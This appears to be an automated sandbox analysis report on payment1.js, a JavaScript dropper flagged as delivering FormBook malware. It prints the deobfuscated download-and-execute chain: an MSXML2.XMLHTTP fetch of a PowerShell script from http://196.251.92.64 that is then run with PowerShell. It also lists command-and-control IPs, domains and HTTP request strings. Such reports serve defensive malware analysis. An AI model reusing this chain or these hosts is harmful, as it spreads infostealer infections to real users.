                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"Scripting.FileSystemObject"', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Failed to execute PowerShell script: "', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', '"Scripting.FileSystemObject"', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 4x nop then xor eax, eax10_2_03059FB0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 4x nop then mov ebx, 00000004h10_2_036504CE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52381 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52511 -> 199.59.243.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52584 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52495 -> 199.59.243.160:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52532 -> 199.59.243.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52656 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52479 -> 199.59.243.160:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52659 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52658 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52660 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52663 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52661 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52619 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52600 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52665 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52662 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52657 -> 162.0.231.203:80
                Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 196.251.92.64:80 -> 192.168.2.4:49731
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52666 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52568 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:52664 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:52667 -> 47.83.1.90:80
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 196.251.92.64 80Jump to behavior
                JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
                Source: payment1.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
                Source: payment1.jsArgument value : ['"http://196.251.92.64/crypt/popo.ps1","C:\\Temp\\dddddd.ps1"']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba']Go to definition
                Source: payment1.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
                Source: payment1.jsArgument value : ['"GET","http://196.251.92.64/crypt/popo.ps1",false', '"Send"']Go to definition
                Source: payment1.jsArgument value : ['"http://196.251.92.64/crypt/popo.ps1","C:\\Temp\\dddddd.ps1"']Go to definition
                Source: payment1.jsReturn value : ['MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba']Go to definition
                Source: payment1.jsReturn value : ['MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba', 'rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i', 'W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jP', '371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4', 'q3jLyxrLt2jQzwn0,bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrV', 'bab4W6tdK8oJrG,W4iJW43dGGa8W5i7W40iWOVcRq4,message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93z', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['124678FeSFCc,WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlc', 'CreateTextFile,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,rM9SzgvYrxHPC3rZ,Download ', 'WQ7dVXVcVCkpCLJcM8keW6W,W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU', 'W4pcUGdcPCojWOdcSJCzWPNdPSkW,WRTMW6pdJa,otCXnJC0ng50B2XSrq,WQlcV2JdRXZcRslcU8o8sSkOuCkXWORdLmkQjg99s', 'message,12642224tnuDGo,Quit,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,124678FeSFCc,WQ7dVXVc']Go to definition
                Source: payment1.jsReturn value : ['"MSXML2.XMLHTTP"']Go to definition
                Source: payment1.jsReturn value : ['MSXML2.XMLHTTP,371190cReolU,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,q3jLyxrLt2jQzwn0,ba']Go to definition
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.physicsbrain.xyz
                Source: DNS query: www.infiniteve.xyz
                Source: DNS query: www.weilaishijie.xyz
                Source: global trafficTCP traffic: 192.168.2.4:52380 -> 1.1.1.1:53
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: unknownTCP traffic detected without corresponding DNS query: 196.251.92.64
                Source: global trafficHTTP traffic detected: GET /crypt/popo.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 196.251.92.64Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /9gtw/?JZfd=bFQVCxzo4meVUPRnP0n3FR5ZzBASsiXRVHB0uPlWJiDXwsbOt8zcfdxm4ktJdQTn5zPq+Y8ykDyEtSWLtIWRcrie4i7GHURObbczaEgRbEWCMNyWzbPKN50=&28t=_DlH9FNpJbu HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.lucynoel6465.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                Source: global trafficHTTP traffic detected: GET /0c5p/?JZfd=ZkUTV7pI9Ap5vIyRRAq5W5SemCe80v7MV0MOYxheQ3+8mZZcGVhaedsyExvQ8P0JBljjtNlykIwC9TSJUDwzYqYInCYcfCsRcBd6++ZWi3nQtc+XigtdVu0=&28t=_DlH9FNpJbu HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.travel-cure.sbsConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
